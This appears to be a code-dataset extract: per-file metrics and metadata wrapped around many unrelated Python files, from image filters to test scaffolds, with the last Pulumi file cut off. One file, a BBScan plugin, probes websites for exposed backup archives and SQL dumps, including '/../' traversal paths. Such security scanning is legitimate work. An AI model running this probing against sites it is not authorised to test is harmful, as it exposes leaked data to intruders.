0.32377
244
18
28
13.555556
0.787879
0
0
0.181818
0
0
0.102222
0
0
0
0
0
0
1
0.272727
false
0
0
0
0.363636
0.272727
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
fbdd9dcc5719737b6e2f6f877ae80b0cc5d6cbe3
948
py
Python
savu/plugins/filters/denoising/base_median_filter_tools.py
nghia-vo/Savu
1cf7343c141224643b2e1fb2f05e74448bc4fd58
[ "Apache-2.0" ]
null
null
null
savu/plugins/filters/denoising/base_median_filter_tools.py
nghia-vo/Savu
1cf7343c141224643b2e1fb2f05e74448bc4fd58
[ "Apache-2.0" ]
null
null
null
savu/plugins/filters/denoising/base_median_filter_tools.py
nghia-vo/Savu
1cf7343c141224643b2e1fb2f05e74448bc4fd58
[ "Apache-2.0" ]
null
null
null
from savu.plugins.plugin_tools import PluginTools class BaseMedianFilterTools(PluginTools): """A plugin to apply 2D/3D median filter. The 3D capability is enabled through padding. Note that the kernel_size in 2D will be kernel_size x kernel_size and in 3D case kernel_size x kernel_size x kernel_size. """ def define_parameters(self): """ kernel_size: visibility: basic dtype: int description: Kernel size of the median filter. default: 3 dimension: visibility: advanced dtype: str description: Dimensionality of the filter 2D/3D. default: 3D pattern: visibility: intermediate dtype: str options: [PROJECTION, SINOGRAM, VOLUME_YZ, VOLUME_XZ, VOLUME_XY] description: Pattern to apply this to. default: PROJECTION """
32.689655
77
0.60654
106
948
5.311321
0.54717
0.142096
0.058615
0.090586
0.094139
0
0
0
0
0
0
0.0144
0.340717
948
28
78
33.857143
0.8864
0.679325
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
fbe11ee1b54340c89c30f000c67cbaa376e0508a
3,028
py
Python
scripts/scan_by_hostname_or_folder.py
NeolithEra/BBScan
d754e9664d05e0e80ec879ebed227ad713976196
[ "Apache-2.0" ]
1
2020-04-18T15:36:55.000Z
2020-04-18T15:36:55.000Z
scripts/scan_by_hostname_or_folder.py
321811788/BBScan
af852f3d0f2d98a0c5fde5823a15ec8d29c520ea
[ "Apache-2.0" ]
null
null
null
scripts/scan_by_hostname_or_folder.py
321811788/BBScan
af852f3d0f2d98a0c5fde5823a15ec8d29c520ea
[ "Apache-2.0" ]
1
2020-04-18T15:36:59.000Z
2020-04-18T15:36:59.000Z
# /{hostname_or_folder}.zip {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.rar {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.tar.gz {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.tar.bz2 {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.tgz {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.7z {status=206} {type="application/"} {root_only} # /{hostname_or_folder}.log {status=206} {type="application/"} {root_only} # # /{sub}.zip {status=206} {type="application/"} {root_only} # /{sub}.rar {status=206} {type="application/"} {root_only} # /{sub}.tar.gz {status=206} {type="application/"} {root_only} # /{sub}.tar.bz2 {status=206} {type="application/"} {root_only} # /{sub}.tgz {status=206} {type="application/"} {root_only} # /{sub}.7z {status=206} {type="application/"} {root_only} # # /../{hostname_or_folder}.zip {status=206} {type="application/"} # /../{hostname_or_folder}.rar {status=206} {type="application/"} # /../{hostname_or_folder}.tar.gz {status=206} {type="application/"} # /../{hostname_or_folder}.tar.bz2 {status=206} {type="application/"} # /../{hostname_or_folder}.tgz {status=206} {type="application/"} # /../{hostname_or_folder}.7z {status=206} {type="application/"} # /../{hostname_or_folder}.log {status=206} {type="application/"} from lib.common import save_user_script_result def do_check(self, url): if not self.conn_pool: return extensions = ['.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log', '.sql'] if url == '/' and self.domain_sub: file_names = [self.host.split(':')[0], self.domain_sub] for name in file_names: for ext in extensions: status, headers, html_doc = self.http_request('/' + name + ext) if status == 206 and \ (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0) or \ (ext == '.sql' and html_doc.find("CREATE TABLE") >= 0): save_user_script_result(self, status, self.base_url + '/' + name + ext, '', 'Compressed File') elif url != '/': # sub folders like /aaa/bbb/ folder_name = url.split('/')[-2] if len(folder_name) >= 4: url_prefix = url[: -len(folder_name)-1] for ext in extensions: status, headers, html_doc = self.http_request(url_prefix + folder_name + ext) if status == 206 and headers.get('content-type', '').find('application/') >= 0: save_user_script_result(self, status, self.base_url + url_prefix + folder_name + ext, '', 'Compressed File')
56.074074
111
0.554491
349
3,028
4.601719
0.209169
0.123288
0.161893
0.298879
0.772105
0.749066
0.722914
0.619552
0.393524
0.244085
0
0.037787
0.265852
3,028
53
112
57.132075
0.68466
0.521466
0
0.166667
0
0
0.096842
0
0
0
0
0
0
1
0.041667
false
0
0.041667
0
0.125
0
0
0
0
null
0
0
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
8398280950838898824ce2da38a075df0f144502
243
py
Python
activflow/quotient/validators.py
mcgauranc/mosaiq
33c4b7db8f3dd1ef18dc0b63d06fb05ee8df4de0
[ "Apache-2.0" ]
567
2016-03-27T11:44:29.000Z
2021-06-12T14:06:55.000Z
activflow/tests/validators.py
NWUSTUDENT/ActivFlow
c5b3e340db9200b29fcaea778e0e6ed0f7ba491b
[ "Apache-2.0" ]
14
2016-03-26T19:33:52.000Z
2021-06-10T17:35:19.000Z
activflow/tests/validators.py
NWUSTUDENT/ActivFlow
c5b3e340db9200b29fcaea778e0e6ed0f7ba491b
[ "Apache-2.0" ]
111
2016-03-31T18:33:14.000Z
2021-06-12T14:06:57.000Z
"""Custom validation logic""" from django.core.exceptions import ValidationError def validate_initial_cap(value): """Sample validation""" if not value[0].isupper(): raise ValidationError('First character should be capital')
24.3
66
0.728395
28
243
6.25
0.892857
0
0
0
0
0
0
0
0
0
0
0.004902
0.160494
243
9
67
27
0.852941
0.168724
0
0
0
0
0.172775
0
0
0
0
0
0
1
0.25
false
0
0.25
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
83e8e0b2f9c02d8e24e0cd19f4fb645dcb4a4c19
97
py
Python
sniffer/__init__.py
matham/sniffer
3ecb999bce0c01bf770b774d11a2bfb7362e20f2
[ "MIT" ]
null
null
null
sniffer/__init__.py
matham/sniffer
3ecb999bce0c01bf770b774d11a2bfb7362e20f2
[ "MIT" ]
null
null
null
sniffer/__init__.py
matham/sniffer
3ecb999bce0c01bf770b774d11a2bfb7362e20f2
[ "MIT" ]
null
null
null
''' ''' __version__ = '0.1-dev' device_config_name = 'Devices' exp_config_name = 'experiment'
10.777778
30
0.680412
12
97
4.833333
0.833333
0.344828
0
0
0
0
0
0
0
0
0
0.024096
0.14433
97
8
31
12.125
0.674699
0
0
0
0
0
0.266667
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
83f460a00cf60fe97299760a32cc20478b67569f
281
py
Python
audio_f.py
svnviet/TTS
dd951048d659e18f34b71530f34144e8625e20e1
[ "MIT" ]
null
null
null
audio_f.py
svnviet/TTS
dd951048d659e18f34b71530f34144e8625e20e1
[ "MIT" ]
1
2020-04-19T14:32:59.000Z
2020-04-19T14:32:59.000Z
audio_f.py
svnviet/TTS
dd951048d659e18f34b71530f34144e8625e20e1
[ "MIT" ]
null
null
null
# from hparams import hparams # from text import text_to_sequence # # # def Sy(text): # cleaner_names = [x.strip() for x in hparams.cleaners.split(',')] # seq = text_to_sequence(text, cleaner_names) # return text # print(Sy('danh mục đầu tư (so với các mn)'))
28.1
71
0.651246
42
281
4.214286
0.642857
0.067797
0.158192
0
0
0
0
0
0
0
0
0
0.217082
281
9
72
31.222222
0.804545
0.900356
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
83f63344c8c2884cc3b5b8f00c73296312a3da18
1,357
py
Python
tests/scaffolds/xunit/test_suite_setup_failure.py
filfreire/questions-three
1d1d621d5647407bf2d1b271e0b9c7c9f1afc5c8
[ "MIT" ]
5
2019-07-22T06:04:07.000Z
2021-07-23T06:01:51.000Z
tests/scaffolds/xunit/test_suite_setup_failure.py
filfreire/questions-three
1d1d621d5647407bf2d1b271e0b9c7c9f1afc5c8
[ "MIT" ]
15
2020-07-28T17:33:40.000Z
2021-08-23T17:30:05.000Z
tests/scaffolds/xunit/test_suite_setup_failure.py
filfreire/questions-three
1d1d621d5647407bf2d1b271e0b9c7c9f1afc5c8
[ "MIT" ]
4
2019-08-25T22:41:59.000Z
2020-10-21T14:28:15.000Z
from logging import StreamHandler from unittest import TestCase, main from expects import expect, equal from twin_sister import open_dependency_context from questions_three.event_broker import EventBroker, subscribe_event_handlers from questions_three.scaffolds.xunit import TestSuite from twin_sister.fakes import EmptyFake def run_suite(): class Suite(TestSuite): def setup_suite(self): raise RuntimeError("I got the boogie fever") def test_one(self): pass def test_two(self): pass def test_three(self): pass class TestSuiteSetupFailure(TestCase): """ As a test developer, I would like the suite to automatically skip every test if setup fails So I do not need to skip each test individually """ def setUp(self): self.context = open_dependency_context(supply_fs=True, supply_logging=True) self.context.inject(StreamHandler, EmptyFake()) EventBroker.reset() subscribe_event_handlers(self) self.skip_events = 0 def tearDown(self): self.context.close() def on_test_skipped(self, **kwargs): self.skip_events += 1 def test_skips_all_tests(self): run_suite() expect(self.skip_events).to(equal(3)) # number of tests if "__main__" == __name__: main()
25.12963
83
0.683125
173
1,357
5.144509
0.473988
0.031461
0.047191
0.033708
0
0
0
0
0
0
0
0.002921
0.243183
1,357
53
84
25.603774
0.863681
0.114959
0
0.090909
0
0
0.025489
0
0
0
0
0
0
1
0.272727
false
0.090909
0.212121
0
0.545455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
3
f7b45d31d5af3e815012795068a28de2e104dada
837
py
Python
head_first_design_patterns/decorator/pizza/pizza.py
incolumepy-cursos/poop
e4ac26b8d2a8c263a93fd9642fab52aafda53d80
[ "MIT" ]
null
null
null
head_first_design_patterns/decorator/pizza/pizza.py
incolumepy-cursos/poop
e4ac26b8d2a8c263a93fd9642fab52aafda53d80
[ "MIT" ]
null
null
null
head_first_design_patterns/decorator/pizza/pizza.py
incolumepy-cursos/poop
e4ac26b8d2a8c263a93fd9642fab52aafda53d80
[ "MIT" ]
null
null
null
from abc import abstractmethod """ NOTES: - Thickcrust and Thincrust are pizza, changing description and implement your own price - description in class Pizza is used as a default - As an abstract method, cost should be implemented by subclasses. It is used to formalize a contract between subclasses. """ class Pizza: description = "Basic Pizza" def get_description(self): return self.description @abstractmethod def cost(self): raise NotImplementedError class ThickcrustPizza(Pizza): def __init__(self): self.description = "Thick crust pizza, with tomato sauce" def cost(self): return 7.99 class ThincrustPizza(Pizza): def __init__(self): self.description = "Thin crust pizza, with tomato sauce" def cost(self): return 7.99
22.026316
76
0.684588
103
837
5.475728
0.533981
0.042553
0.058511
0.056738
0.269504
0.269504
0.159574
0.159574
0.159574
0.159574
0
0.009539
0.248507
837
37
77
22.621622
0.887122
0
0
0.388889
0
0
0.151013
0
0
0
0
0
0
1
0.333333
false
0
0.055556
0.166667
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
f7c6628a945394fac9c1407e41ed845e9d9851a1
6,723
py
Python
src/pymates/markdown.py
weistn/pymates
c375b46469ebb23fdb29f81ec175837751d0f0ce
[ "BSD-3-Clause" ]
null
null
null
src/pymates/markdown.py
weistn/pymates
c375b46469ebb23fdb29f81ec175837751d0f0ce
[ "BSD-3-Clause" ]
null
null
null
src/pymates/markdown.py
weistn/pymates
c375b46469ebb23fdb29f81ec175837751d0f0ce
[ "BSD-3-Clause" ]
null
null
null
import os import pymates.fonts from pymates.dom import DocumentNode, ParagNode, StyleNode, SpanNode, MathNode, inline from pymates.lom import Alignment def document(): return DocumentNode(document) def pagesize(size): return style(pageSize=size) @inline("counters") def counter(node, counterFmt, refFmt, *names): section = node.section() if section == None: raise BaseException("Parent of counter must be a section") doc = node.document() c = [] for i in range(0, len(names) - 1): c.append(doc.counter(names[i])) c.append(doc.incCounter(names[len(names) - 1])) s = counterFmt.format(*c) section.setReferenceName(refFmt.format(*c)) return s @inline("counters") def label(node, name): section = node.section() if section == None: raise BaseException("Parent of label must be a section") node.document().setLabel(name, section) @inline("references") def ref(node, name): section = node.document().label(name) return section.referenceName() def p(*children): return ParagNode(p, style={"fontSize": 12}, children=children) def h1(*children): return ParagNode(h1, style={"fontSize": 32}, children=children) def h2(*children): return ParagNode(h2, style={"fontSize": 24}, children=children) def h3(*children): return ParagNode(h3, style={"fontSize": 20}, children=children) def h4(*children): return ParagNode(h4, style={"fontSize": 16}, children=children) def bulletlist(*children): print("------------- BULLET LIST-----------") return ParagNode(bulletlist, style={}, children=children) def bulletitem(*children): return ParagNode(bulletitem, style={"fontSize": 12, "enum": "- "}, parentContainer=bulletlist, isExplicitContainer=True, children=children) # TODO: listitem def chapter(*children): return h1(counter("Chapter {}: ", "Chapter {}", "Level1"), *children) def subchapter(*children): return h2(counter("Section {}.{}: ", "Section {}.{}", "Level1", "Level2"), *children) def code(*children): return ParagNode(code, style={"fontFamily": "Courier"}, children=children) def math(*children): return ParagNode(code, style={}, children=children) def style(child = None, **styleInfo): return StyleNode(style, child=child, style=styleInfo) def bold(child = None): return style(child, fontWeight=700) def italic(child = None): return style(child, italic=True) def emph(child = None): return bold(italic(child)) def underline(child = None): return style(child, underline=True) def strike(child = None): return style(child, strikeOut=True) def tt(child = None): return style(child, fontFamily="Courier") def color(red, green, blue, child = None): return style(child, color=(red, green, blue)) def red(child = None): return color(255, 0, 0, child) def align(a, child = None): return style(child, align=a) def left(child = None): return align(Alignment.Left, child) def right(child = None): return align(Alignment.Right, child) def center(child = None): return align(Alignment.Center, child) def justify(child = None): return align(Alignment.Justify, child) def margin(left=None, top=None, right=None, bottom=None, child=None): return style(child, margin={"left": left, "top": top, "right": right, "bottom": bottom}) def padding(left=None, top=None, right=None, bottom=None, child=None): return style(child, padding={"left": left, "top": top, "right": right, "bottom": bottom}) def inlineMath(child): return style(child, math=True) def inlineCode(child): return style(child, color=(0xd0, 0x10, 0x40), fontFamily="Courier") # def fract(counter, denominator): # return MathNode(fract, [counter, denominator]) def span(*children): return SpanNode(span, list(children)) def pageLayout(repeat = False): return style(None, pageLayout={"repeat": repeat}) def nextPageLayout(repeat = False): return style(None, nextPageLayout={"repeat": repeat}) def pageBox(flow, rect): return style(None, pageBox={"rect": rect, "flow": flow}) def pageBreak(): return style(child, pageBreak=True) # scope is "document" or "flow" def flow(name = "", scope = "document"): if scope != "document" and scope != "flow": raise BaseException(f"Unknown flow scope '{scope}'") if name == "" and scope == "flow": raise BaseException("A flow with 'scope=flow' must have a name") return style(flow = name, flowScope = scope) def py(value): return value @inline("counters") def setvar(node, name, value): node.document().setVariable(name, value) return None @inline("references") def var(node, name): return node.document().variable(name) # ----------------------------------------- _lobster = False def lobster(child = None): global _lobster if not _lobster: fontPath = os.path.join(os.path.dirname(pymates.__file__), "fonts") pymates.fonts.registerFont(os.path.join(fontPath, "Lobster-Regular.ttf"), "Lobster", 400, False) _lobster = True return style(child, fontFamily = "Lobster") _roboto = False def roboto(child = None): global _roboto if not _roboto: fontPath = os.path.join(os.path.dirname(pymates.__file__), "fonts") pymates.fonts.registerFont(os.path.join(fontPath, "Roboto-Regular.ttf"), "Roboto", 400, False) pymates.fonts.registerFont(os.path.join(fontPath, "Roboto-Bold.ttf"), "Roboto", 700, False) _roboto = True return style(child, fontFamily = "Roboto") # ----------------------------------------- def mybox(*children): return p(style(flow = "mybox"), *children) from pymates.sizes import mm, A4, landscape def slidedeck(): return pagesize(landscape(A4)) def slide(*children): return ParagNode(slide, style={}, parentContainer=document, isDefaultContainer=True, children=( flow(), pageLayout(), margin(20*mm, 50*mm, 20*mm, 20*mm), pageBox(flow="title", rect=(20*mm, 15*mm, 250*mm, 30*mm)), pageBox(flow="footer", rect=(20*mm, 190*mm, 250*mm, 10*mm)), *children )) def title(*children): return ParagNode(title, style={"fontSize": 32}, parentContainer=slide, children=( flow("title", "flow"), *children )) def footer(localPage = False, *children): return ParagNode(footer, style={"fontSize": 12}, children=( flow("footer", "flow" if localPage else "document"), *children )) # ----------------------------------------- if __name__ == '__main__': deck().append( slide(tmpl="black", bold=True).append( "Hello ", bold(span(italic("World"), "!!!")) ) ) # ``` # \deck # \slide(tmpl="white") # Hello \bold{\italic{World}!!!} # ```
28.978448
143
0.652239
817
6,723
5.337821
0.221542
0.047925
0.051594
0.041275
0.245127
0.124283
0.124283
0.124283
0.111901
0.094015
0
0.015451
0.172096
6,723
232
144
28.978448
0.768056
0.047449
0
0.088608
0
0
0.098561
0
0
0
0.001877
0.00431
0
1
0.316456
false
0
0.031646
0.265823
0.658228
0.006329
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
f7c70f678bb26d9c05f0d8b472e2413618e50c95
938
py
Python
entities/recommendation.py
bitmarc/Recomendautos_Server
4db5ca2f07d97d2f025f5879b4a25553c2eb2e72
[ "OML" ]
null
null
null
entities/recommendation.py
bitmarc/Recomendautos_Server
4db5ca2f07d97d2f025f5879b4a25553c2eb2e72
[ "OML" ]
null
null
null
entities/recommendation.py
bitmarc/Recomendautos_Server
4db5ca2f07d97d2f025f5879b4a25553c2eb2e72
[ "OML" ]
null
null
null
''' Clase que modela una entidad de recomendación, contiene la informacion de automoviles y perfil ''' class Recommendation: def __init__(self, id, arrAutomobiles, profile): self.__id=id self.__arrAutomobiles=arrAutomobiles self.__profile=profile def get_recommendation(self): dataA=[] for automobile in self.__arrAutomobiles: dataA.append(automobile.get_automobile()) data={"idRecommendation":self.__id, "results":dataA, "profile":self.__profile.get_profile()} return data def getId(self): return self.__id def setId(self, id): self.__id=id def getArrAutomobiles(self): return self.__arrAutomobiles def setResults(self, arrAutomobiles): self.__arrAutomobiles=arrAutomobiles def getProfile(self): return self.__profile def setProfile(self, profile): self.__profile=profile
26.055556
100
0.668443
98
938
6.081633
0.377551
0.060403
0.07047
0
0
0
0
0
0
0
0
0
0.24307
938
36
101
26.055556
0.839437
0.100213
0
0.26087
0
0
0.035842
0
0
0
0
0
0
1
0.347826
false
0
0
0.130435
0.565217
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
f7df1b777d2fdeba30c848da1b2c74a7801a6a72
93
py
Python
python/testData/intentions/returnTypeInPy3Annotation.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/intentions/returnTypeInPy3Annotation.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/intentions/returnTypeInPy3Annotation.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
def g(x): return x def f(x): y = g(x.keys()) return y<caret>.startswith('foo')
11.625
37
0.526882
17
93
2.882353
0.588235
0.081633
0
0
0
0
0
0
0
0
0
0
0.268817
93
7
38
13.285714
0.720588
0
0
0
0
0
0.032258
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
3
790798beeadcf685cc4291097796e2d302a38fec
239
py
Python
revise/libs/python/pyste/src/Pyste/__init__.py
DD-L/deel.boost.python
e32cd62022bbf7c5822d150150330d988e041f02
[ "MIT" ]
198
2015-01-13T05:47:18.000Z
2022-03-09T04:46:46.000Z
thirdparty/boost-python/libs/python/pyste/src/Pyste/__init__.py
alexa-infra/negine
d9060a7c83a41c95c361c470b56c2ddab3ba04de
[ "MIT" ]
9
2015-01-28T16:33:19.000Z
2020-04-12T23:03:28.000Z
thirdparty/boost-python/libs/python/pyste/src/Pyste/__init__.py
alexa-infra/negine
d9060a7c83a41c95c361c470b56c2ddab3ba04de
[ "MIT" ]
139
2015-01-15T20:09:31.000Z
2022-01-31T15:21:16.000Z
# Copyright Bruno da Silva de Oliveira 2003. Use, modification and # distribution is subject to the Boost Software License, Version 1.0. # (See accompanying file LICENSE_1_0.txt or copy at # http://www.boost.org/LICENSE_1_0.txt)
34.142857
70
0.74477
39
239
4.461538
0.794872
0.034483
0.103448
0.137931
0
0
0
0
0
0
0
0.050761
0.175732
239
6
71
39.833333
0.832487
0.92887
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
791889e899a24dfc909dd3df7de14402132d5121
1,056
py
Python
floreal/templatetags/floreal_filters.py
roco/circuit-court
a405e871fe044dee591e646b1d1523c8465e6054
[ "MIT" ]
null
null
null
floreal/templatetags/floreal_filters.py
roco/circuit-court
a405e871fe044dee591e646b1d1523c8465e6054
[ "MIT" ]
null
null
null
floreal/templatetags/floreal_filters.py
roco/circuit-court
a405e871fe044dee591e646b1d1523c8465e6054
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- from django import template from floreal import models as m register = template.Library() @register.filter def price(f): return u"%.02f€" % f @register.filter def price_nocurrency(f): return u"%.02f" % f @register.filter def weight(w): if w>=1: return u"%.2gkg" % w else: return u"%dg" % (w*1000) @register.filter def email(u): return '"%s %s" <%s>' % (u.first_name, u.last_name, u.email) @register.filter def unit_multiple(unit): if unit[0].isdigit(): return u"×"+unit else: return u" "+unit @register.filter def subgroup_state(sg, dv): x = dv.subgroupstatefordelivery_set.filter(delivery=dv, subgroup=sg) return x[0].state if x else m.SubgroupStateForDelivery.DEFAULT @register.filter def subgroup_has_purchases(sg, dv): return m.Purchase.objects.filter(product__delivery_id=dv, user__in=m.Subgroup.objects.get(pk=sg).users.all()).exists() @register.filter def order(dv, u): return m.Order(u, dv)
19.555556
97
0.650568
157
1,056
4.305732
0.420382
0.16568
0.201183
0.065089
0
0
0
0
0
0
0
0.015403
0.200758
1,056
53
98
19.924528
0.783175
0.035985
0
0.242424
0
0
0.033465
0
0
0
0
0
0
1
0.242424
false
0
0.060606
0.151515
0.545455
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
3
793b431cf5d0d878ea1f8b1e525e56a41bc825c6
171
py
Python
tests/exploratory/multiple_basedirs/radish2/steps.py
temoctzin/radish
1d904b9a7bf9eb5b263c86e3fc3a996956747ecc
[ "MIT" ]
null
null
null
tests/exploratory/multiple_basedirs/radish2/steps.py
temoctzin/radish
1d904b9a7bf9eb5b263c86e3fc3a996956747ecc
[ "MIT" ]
null
null
null
tests/exploratory/multiple_basedirs/radish2/steps.py
temoctzin/radish
1d904b9a7bf9eb5b263c86e3fc3a996956747ecc
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from radish import then @then("I expect the result to be {result:g}") def expect_result(step, result): assert step.context.result == result
19
45
0.678363
26
171
4.423077
0.692308
0
0
0
0
0
0
0
0
0
0
0.007092
0.175439
171
8
46
21.375
0.808511
0.122807
0
0
0
0
0.243243
0
0
0
0
0
0.25
1
0.25
false
0
0.25
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
f731b0e7750a7bea8517170165c3c68c3dc22cf8
844
py
Python
setup.py
jbarbadillo/pycoinmon
035e64652c533a569c6b236f54e12aff35ad82b1
[ "MIT" ]
null
null
null
setup.py
jbarbadillo/pycoinmon
035e64652c533a569c6b236f54e12aff35ad82b1
[ "MIT" ]
null
null
null
setup.py
jbarbadillo/pycoinmon
035e64652c533a569c6b236f54e12aff35ad82b1
[ "MIT" ]
null
null
null
from setuptools import setup from pycoinmon.metadata import Metadata metadata = Metadata() setup( name = 'pycoinmon', packages = ['pycoinmon'], version = metadata.get_version(), license = 'MIT', description = 'Python Port Based on COINMON', url = 'https://github.com/RDCH106/pycoinmon', keywords = ['bitcoin', 'criptocurrency', 'crypto', 'ticker', 'python', 'cli', 'price-tracker', 'command-line'], classifiers = ['Programming Language :: Python', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6'], )
40.190476
115
0.575829
79
844
6.139241
0.531646
0.274227
0.360825
0.268041
0
0
0
0
0
0
0
0.02459
0.277251
844
21
116
40.190476
0.770492
0
0
0
0
0
0.478107
0
0
0
0
0
0
1
0
false
0
0.105263
0
0.105263
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
f7346818a39b5a17a62b2966aaea4541f1d02cd3
55,751
py
Python
operators/elastic-cloud-eck/python/pulumi_pulumi_kubernetes_crds_operators_elastic_cloud_eck/enterprisesearch/v1beta1/_inputs.py
pulumi/pulumi-kubernetes-crds
372c4c0182f6b899af82d6edaad521aa14f22150
[ "Apache-2.0" ]
null
null
null
operators/elastic-cloud-eck/python/pulumi_pulumi_kubernetes_crds_operators_elastic_cloud_eck/enterprisesearch/v1beta1/_inputs.py
pulumi/pulumi-kubernetes-crds
372c4c0182f6b899af82d6edaad521aa14f22150
[ "Apache-2.0" ]
2
2020-09-18T17:12:23.000Z
2020-12-30T19:40:56.000Z
operators/elastic-cloud-eck/python/pulumi_pulumi_kubernetes_crds_operators_elastic_cloud_eck/enterprisesearch/v1beta1/_inputs.py
pulumi/pulumi-kubernetes-crds
372c4c0182f6b899af82d6edaad521aa14f22150
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # *** WARNING: this file was generated by crd2pulumi. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = [ 'EnterpriseSearchSpecArgs', 'EnterpriseSearchSpecConfigRefArgs', 'EnterpriseSearchSpecElasticsearchRefArgs', 'EnterpriseSearchSpecHttpArgs', 'EnterpriseSearchSpecHttpServiceArgs', 'EnterpriseSearchSpecHttpServiceSpecArgs', 'EnterpriseSearchSpecHttpServiceSpecPortsArgs', 'EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs', 'EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs', 'EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs', 'EnterpriseSearchSpecHttpTlsArgs', 'EnterpriseSearchSpecHttpTlsCertificateArgs', 'EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs', 'EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs', 'EnterpriseSearchStatusArgs', ] @pulumi.input_type class EnterpriseSearchSpecArgs: def __init__(__self__, *, config: Optional[pulumi.Input[Mapping[str, Any]]] = None, config_ref: Optional[pulumi.Input['EnterpriseSearchSpecConfigRefArgs']] = None, count: Optional[pulumi.Input[int]] = None, elasticsearch_ref: Optional[pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs']] = None, http: Optional[pulumi.Input['EnterpriseSearchSpecHttpArgs']] = None, image: Optional[pulumi.Input[str]] = None, pod_template: Optional[pulumi.Input[Mapping[str, Any]]] = None, service_account_name: Optional[pulumi.Input[str]] = None, version: Optional[pulumi.Input[str]] = None): """ EnterpriseSearchSpec holds the specification of an Enterprise Search resource. :param pulumi.Input[Mapping[str, Any]] config: Config holds the Enterprise Search configuration. :param pulumi.Input['EnterpriseSearchSpecConfigRefArgs'] config_ref: ConfigRef contains a reference to an existing Kubernetes Secret holding the Enterprise Search configuration. Configuration settings are merged and have precedence over settings specified in `config`. :param pulumi.Input[int] count: Count of Enterprise Search instances to deploy. :param pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs'] elasticsearch_ref: ElasticsearchRef is a reference to the Elasticsearch cluster running in the same Kubernetes cluster. :param pulumi.Input['EnterpriseSearchSpecHttpArgs'] http: HTTP holds the HTTP layer configuration for Enterprise Search resource. :param pulumi.Input[str] image: Image is the Enterprise Search Docker image to deploy. :param pulumi.Input[Mapping[str, Any]] pod_template: PodTemplate provides customisation options (labels, annotations, affinity rules, resource requests, and so on) for the Enterprise 